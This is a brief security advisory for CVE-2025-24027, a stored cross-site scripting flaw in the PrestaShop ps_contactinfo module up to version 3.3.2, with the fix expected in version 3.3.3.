CVE-2025-24027

Name of the Vulnerable Software and Affected Versions PrestaShop module ps contactinfo versions up to and including 3.3.2

Description The ps contactinfo module has a cross-site scripting (XSS) vulnerability. This issue can be exploited in shops that are made vulnerable by third-party modules, such as those vulnerable to SQL injections. For example, if a shop has a third-party module vulnerable to SQL injections, then ps contactinfo might execute a stored cross-site scripting in formatting objects. A commit has been made to prevent formatted addresses from displaying a stored XSS in the database, and the fix is expected to be available in version 3.3.3.

Recommendations For versions up to and including 3.3.2, apply the fix and keep all modules maintained and updated to prevent exploitation. As a temporary workaround, consider keeping all modules updated and maintained, as no other workarounds are available aside from applying the fix. For version 3.3.3 and later, no action is required as the fix is expected to be included in this version.